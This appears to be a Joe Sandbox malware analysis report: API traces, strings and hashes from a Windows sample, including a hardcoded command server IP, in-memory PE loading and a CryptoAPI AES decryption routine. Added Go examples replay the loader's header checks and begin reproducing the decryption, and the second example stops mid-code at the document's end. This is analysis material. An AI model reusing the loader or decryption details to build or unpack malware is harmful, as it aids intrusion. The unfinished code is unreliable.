                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                    • API String ID: 2146599340-4172842843
                    • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                    • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                    • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                    • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                    Control-flow Graph
                    • Graph for the function at 495003c (executed / not-executed basic-block edge list from the IDA plugin; the rendered graph is not recoverable from the text). API calls named in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA.
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14

                    Control-flow Graph

                    • Function 0x00405A50 (interactive graph rendering omitted), basic blocks 0x00405A50-0x00406A9C; Win32 API call sites in the graph: Sleep (0x00405A50-0x00406330 and 0x00406A3E-0x00406A45). All other calls are to subroutines inside the image.
                    APIs
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                    • API String ID: 2563648476-311857291
                    • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                    • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                    • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                    • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                    Control-flow Graph

                    • Function 0x00401E50 (interactive graph rendering omitted), basic blocks 0x00401E50-0x004021F9; Win32 API call sites in the graph: InternetOpenA (0x00401EA7-0x00402179). The block at 0x004021C8-0x004021F9 calls back into 0x00401E50.
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: http://
                    • API String ID: 0-1121587658
                    • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                    • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                    • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                    • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                    Control-flow Graph

                    • Function 0x00606B4B (interactive graph rendering omitted), basic blocks 0x00606B4B-0x0060A9FC and 0x00608982-0x00608DF8; Win32 API call sites in the graph: RegOpenKeyA (0x0060A8D4-0x0060A8EF and 0x0060A8FB-0x0060A916), GetNativeSystemInfo (0x0060A95C-0x0060A965).
                    APIs
                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0060A8E7
                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0060A90E
                    • GetNativeSystemInfo.KERNEL32(?), ref: 0060A965
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID: Open$InfoNativeSystem
                    • String ID:
                    • API String ID: 1247124224-0
                    • Opcode ID: 36d5b6e9c21d8abcd7cdcef39b8a262e8012dc77a26b304ac3de0961534107f5
                    • Instruction ID: 2d8d8014c43a29e3b9b4aa2dbdcbd777084760f71e58c0f7fb8591dc87ca9cc7
                    • Opcode Fuzzy Hash: 36d5b6e9c21d8abcd7cdcef39b8a262e8012dc77a26b304ac3de0961534107f5
                    • Instruction Fuzzy Hash: BF41817115420EDFEF25DFA0CD85BEF3BA6EB05340F110526D981C2A80DB764CA5CB5A

                    Control-flow Graph

                    • Function 0x00706839 (interactive graph rendering omitted), basic blocks 0x00706839-0x007068A9; Win32 API call sites in the graph: VirtualProtect (0x0070688D-0x007068A9), followed by a call to 0x007068AC.
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: T@}
                    • API String ID: 544645111-1245257210
                    • Opcode ID: 7f1163518c9d8ce7789f66fff99b1fa5f3d38663bcc5c5ff9879b8fdc1499778
                    • Instruction ID: dedbfc5a40b337e1f3d924e5b04ea25b93734d45fa281e4edb1c8bcf8f83545b
                    • Opcode Fuzzy Hash: 7f1163518c9d8ce7789f66fff99b1fa5f3d38663bcc5c5ff9879b8fdc1499778
                    • Instruction Fuzzy Hash: AA01F96A50D291DFD702CF6085715EA7FF0DE1B720B24C6A7E846CB5C3C2184C2AE762

                    Control-flow Graph

                    • Function 0x00413CB9 (interactive graph rendering omitted), basic blocks 0x00413CB9-0x00413D06; Win32 API call sites in the graph: RtlAllocateHeap (0x00413CE2-0x00413CF3).
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 5(@
                    • API String ID: 1279760036-4133491027
                    • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                    • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                    • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                    • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED

                    Control-flow Graph

                    • Function 0x04950E0F (interactive graph rendering omitted), three basic blocks 0x04950E0F-0x04950E2C; Win32 API call sites in the graph: SetErrorMode twice in the entry block (0x04950E0F-0x04950E24).
                    APIs
                    • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                    • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5

                    Control-flow Graph

                    • Function 0x00605DF2 (interactive graph rendering omitted), basic blocks 0x00605DF2-0x00609633 and 0x00609654-0x0060994F; Win32 API call sites in the graph: LoadLibraryA (0x00605DF2-0x00609633).
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: b7ac928487658b8f3f8aaea6754729709319a5004d6850eeddc60fd3a76e234a
                    • Instruction ID: a947152b9f66a0b3fd12702b7aa342d05c8d836f6efe1d9095b4b76eca72415a
                    • Opcode Fuzzy Hash: b7ac928487658b8f3f8aaea6754729709319a5004d6850eeddc60fd3a76e234a
                    • Instruction Fuzzy Hash: E9116DB291C220AFD305AF28C84567AB7E9EF58720F1A482DEAC9D7340E2315C509BD3

                    Control-flow Graph

                    • Function 0x0070681F (interactive graph rendering omitted), basic blocks 0x0070681F-0x007068A9; Win32 API call sites in the graph: VirtualProtect (0x0070688D-0x007068A9), followed by a call to 0x007068AC.
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 441b078b58ba90b658bc68aca70dc28478d87110c4cd5696fab324390f46118a
                    • Instruction ID: e5fc2831fdd356470ea524ab0c1703fa2738362d58fc0d70fe36ec8eefc9282a
                    • Opcode Fuzzy Hash: 441b078b58ba90b658bc68aca70dc28478d87110c4cd5696fab324390f46118a
                    • Instruction Fuzzy Hash: 4AF0A072908155FFE710CF109930AAE3BE4EB45720F34C606F806835C1C2289C65A625

                    Control-flow Graph

                    • Function 0x00706888 (interactive graph rendering omitted), basic blocks 0x00706888-0x007068A9; Win32 API call sites in the graph: VirtualProtect (0x00706888-0x007068A3), followed by a call to 0x007068AC.
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 7823b62450591213b8f6a08348e639a68a2700acade68dba85eb105d53817ac8
                    • Instruction ID: a65902617783ac2e57b6638db24795b00ab0a47438640e92303edb50415b6834
                    • Opcode Fuzzy Hash: 7823b62450591213b8f6a08348e639a68a2700acade68dba85eb105d53817ac8
                    • Instruction Fuzzy Hash: 7DD0127245826DADDF11DF5448157CE7E24EB19700F148144FC0501992D6661824C705
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 35438392d5f74c6afd304e3771089eb33d598f1ed56aa19d2479f0a468280af7
                    • Instruction ID: 0e2640394576cb740f1f3895bb9228d68199dc944fe15f2cba5b7b3438a78847
                    • Opcode Fuzzy Hash: 35438392d5f74c6afd304e3771089eb33d598f1ed56aa19d2479f0a468280af7
                    • Instruction Fuzzy Hash: EBF0272190D545CED3082F25456417DFFE5AF02300FB54BAFD4C19A2D2D1299989D302
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: d367178d4dd3184ec2ace5532265be73a72373fdaa781de8a491b2fdc268bb30
                    • Instruction ID: 376118c96778d3a7b4bf910704dfb80aeac680cac646707968ad09269c396678
                    • Opcode Fuzzy Hash: d367178d4dd3184ec2ace5532265be73a72373fdaa781de8a491b2fdc268bb30
                    • Instruction Fuzzy Hash: ECF0BEF5A0C646EFE3096F388410379BFE0FB95301F214A6A84C19A1C3E2389959DB02
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                    • Sleep.KERNEL32(000003E8), ref: 049541A9
                    • __Init_thread_footer.LIBCMT ref: 0495477E
                    • __Init_thread_footer.LIBCMT ref: 04954944
                    • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                    • __Init_thread_footer.LIBCMT ref: 04954BDC
                    • __Init_thread_footer.LIBCMT ref: 04954E45
                    • CoInitialize.OLE32(00000000), ref: 04954EC6
                    • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                    • __Init_thread_footer.LIBCMT ref: 04955344
                    • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                    • __Init_thread_footer.LIBCMT ref: 04955652
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                      • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                      • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                    • __Init_thread_footer.LIBCMT ref: 049542AD
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                      • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
                      • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                    • __Init_thread_footer.LIBCMT ref: 04954489
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                    • API String ID: 529012138-2214808123
                    • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                    • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                    • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                    • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                    APIs
                    • SetLastError.KERNEL32(0000000D), ref: 00402F02
                    • SetLastError.KERNEL32(000000C1), ref: 00402F44
                    Strings
                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                    • Size is not valid!, xrefs: 00402F08
                    • DOS header size is not valid!, xrefs: 00402F71
                    • ERROR_OUTOFMEMORY!, xrefs: 00403062
                    • Section alignment invalid!, xrefs: 00402FC7
                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                    • DOS header is not valid!, xrefs: 00402F32
                    • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast
                    • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                    • API String ID: 1452528299-2436911586
                    • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                    • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                    • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                    • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
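The eight strings above are the diagnostics of a MemoryModule-style in-memory PE loader (HOST_MACHINE and AlignValueUp are that library's identifiers), and the two SetLastError values are ERROR_INVALID_DATA (0x0D) and ERROR_BAD_EXE_FORMAT (0xC1): each string names one header check that runs before the image is mapped. The Go program below is an added example, not code from the sample or from Joe Sandbox, that replays those checks on a header-only PE32 constructed inline. It assumes a 0x1000 page size (the loader takes it from GetNativeSystemInfo, which the report also shows being called), i386 as HOST_MACHINE since the sample is 32-bit, and adds a bound on NumberOfSections that the recovered strings give no sign of; Go is used because its standard library is enough to run this offline.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Layout constants for a 32-bit image; the sample is 32-bit, so HOST_MACHINE is i386.
const (
	dosHeaderSize     = 64           // sizeof(IMAGE_DOS_HEADER)
	ntHeaders32Size   = 4 + 20 + 224 // Signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32
	sectionHeaderSize = 40           // sizeof(IMAGE_SECTION_HEADER)
	hostMachine       = 0x014c       // IMAGE_FILE_MACHINE_I386
	pageSize          = 0x1000       // assumption: what GetNativeSystemInfo reports on x86/x64
)

// Error strings are the ones recovered from the sample, so a failing check maps back to its xref.
var (
	ErrSize        = errors.New("Size is not valid!")
	ErrDOSHeader   = errors.New("DOS header is not valid!")
	ErrDOSSize     = errors.New("DOS header size is not valid!")
	ErrNTSignature = errors.New("Signature != IMAGE_NT_SIGNATURE!")
	ErrMachine     = errors.New("FileHeader.Machine != HOST_MACHINE!")
	ErrAlignment   = errors.New("Section alignment invalid!")
	ErrImageSize   = errors.New("alignedImageSize != AlignValueUp!")
	ErrSections    = errors.New("section table is truncated") // added here; not one of the sample's checks
)

func alignValueUp(v, align uint64) uint64 { return (v + align - 1) &^ (align - 1) }

// ValidateImage replays the header checks a MemoryModule-style loader runs before it
// allocates and maps the image, returning the first check that fails.
func ValidateImage(data []byte) error {
	le := binary.LittleEndian
	if len(data) < dosHeaderSize {
		return ErrSize
	}
	if le.Uint16(data) != 0x5A4D { // "MZ"
		return ErrDOSHeader
	}
	lfanew := uint64(le.Uint32(data[0x3C:]))
	if uint64(len(data)) < lfanew+ntHeaders32Size {
		return ErrDOSSize
	}
	nt := data[lfanew:]
	if le.Uint32(nt) != 0x00004550 { // "PE\0\0"
		return ErrNTSignature
	}
	if le.Uint16(nt[4:]) != hostMachine {
		return ErrMachine
	}
	numSections := uint64(le.Uint16(nt[6:]))
	optSize := uint64(le.Uint16(nt[20:]))
	sectionAlignment := uint64(le.Uint32(nt[24+32:]))
	sizeOfImage := uint64(le.Uint32(nt[24+56:]))
	if sectionAlignment&1 != 0 { // only even alignments are accepted
		return ErrAlignment
	}
	// IMAGE_FIRST_SECTION = OptionalHeader + SizeOfOptionalHeader. The loader trusts
	// NumberOfSections; bounding it against the buffer is the hardening a re-implementation wants.
	first := lfanew + 24 + optSize
	if uint64(len(data)) < first+numSections*sectionHeaderSize {
		return ErrSections
	}
	var lastSectionEnd uint64
	for i := uint64(0); i < numSections; i++ {
		sec := data[first+i*sectionHeaderSize:]
		va, raw := uint64(le.Uint32(sec[12:])), uint64(le.Uint32(sec[16:]))
		if raw == 0 { // uninitialised section (.bss) occupies one alignment unit
			raw = sectionAlignment
		}
		if va+raw > lastSectionEnd {
			lastSectionEnd = va + raw
		}
	}
	if alignValueUp(sizeOfImage, pageSize) != alignValueUp(lastSectionEnd, pageSize) {
		return ErrImageSize
	}
	return nil
}

// BuildTestImage constructs a header-only PE32 (DOS header, NT headers, one section header,
// no section data) so ValidateImage can be exercised offline on constructed input.
func BuildTestImage(machine uint16, sectionAlign, sizeOfImage, sectionVA, sectionRaw uint32) []byte {
	le := binary.LittleEndian
	buf := make([]byte, dosHeaderSize+ntHeaders32Size+sectionHeaderSize)
	le.PutUint16(buf, 0x5A4D)
	le.PutUint32(buf[0x3C:], dosHeaderSize) // e_lfanew
	nt := buf[dosHeaderSize:]
	le.PutUint32(nt, 0x00004550)
	le.PutUint16(nt[4:], machine)
	le.PutUint16(nt[6:], 1)      // NumberOfSections
	le.PutUint16(nt[20:], 224)   // SizeOfOptionalHeader
	le.PutUint16(nt[24:], 0x10B) // IMAGE_NT_OPTIONAL_HDR32_MAGIC
	le.PutUint32(nt[24+32:], sectionAlign)
	le.PutUint32(nt[24+56:], sizeOfImage)
	sec := nt[ntHeaders32Size:]
	copy(sec, ".text")
	le.PutUint32(sec[12:], sectionVA)  // VirtualAddress
	le.PutUint32(sec[16:], sectionRaw) // SizeOfRawData
	return buf
}

func main() {
	img := BuildTestImage(hostMachine, 0x1000, 0x3000, 0x1000, 0x1800)
	fmt.Println("well-formed header:", ValidateImage(img))
	fmt.Println("truncated buffer:", ValidateImage(img[:40]))
}
```

The order of the checks is the order the loader needs them in: nothing past the DOS header is read until the buffer is known to hold it, and the section walk only starts once the NT headers have been accepted. The final comparison is what rejects an image whose SizeOfImage disagrees with its section table, the one case a lazy loader would otherwise map with the wrong size.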
                    APIs
                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,73BDA22C), ref: 00403650
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                    • GetLastError.KERNEL32 ref: 004036E8
                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                    • GetLastError.KERNEL32 ref: 0040371A
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                    • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                    Strings
                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 3761881897-63410773
                    • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                    • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                    • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                    • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                    APIs
                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                    • GetLastError.KERNEL32 ref: 0495394F
                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                    • GetLastError.KERNEL32 ref: 04953981
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                    • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                    Strings
                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 3761881897-63410773
                    • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                    • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                    • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                    • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
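The routine above and its copy in the original image at 0x00403650 run the same CryptoAPI sequence: acquire the "Microsoft Enhanced RSA and AES Cryptographic Provider" with dwProvType 0x18 (PROV_RSA_AES) and dwFlags 0xF0000000 (CRYPT_VERIFYCONTEXT), hash data with CALG_SHA_256 (0x800C), derive a CALG_AES_128 (0x660E) key from that hash with CryptDeriveKey, and call CryptDecrypt. Because the key is derived rather than imported, the whole scheme is reproducible offline once the hashed input is known. The Go program below is an added example, not the sample's code, that reproduces the derivation and decryption. It rests on Microsoft's documented CryptDeriveKey rule for SHA-2 hashes (the key is the leading 16 bytes of the finished hash; the 0x36/0x5C expansion applies only to non-SHA-2 hashes) and on CryptoAPI's block-cipher defaults (CBC, all-zero IV, PKCS#5 padding); a CryptSetKeyParam call changing mode or IV would not appear in this trace, so treat those defaults as an assumption to confirm. The report's argument capture for CryptDecrypt does not settle whether Final is TRUE, so the decrypt function takes that as a parameter. Passphrase and plaintext are constructed; the sample's real inputs are not on the page.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"errors"
	"fmt"
)

// CryptoAPI block-cipher defaults, in force unless the caller changes them with
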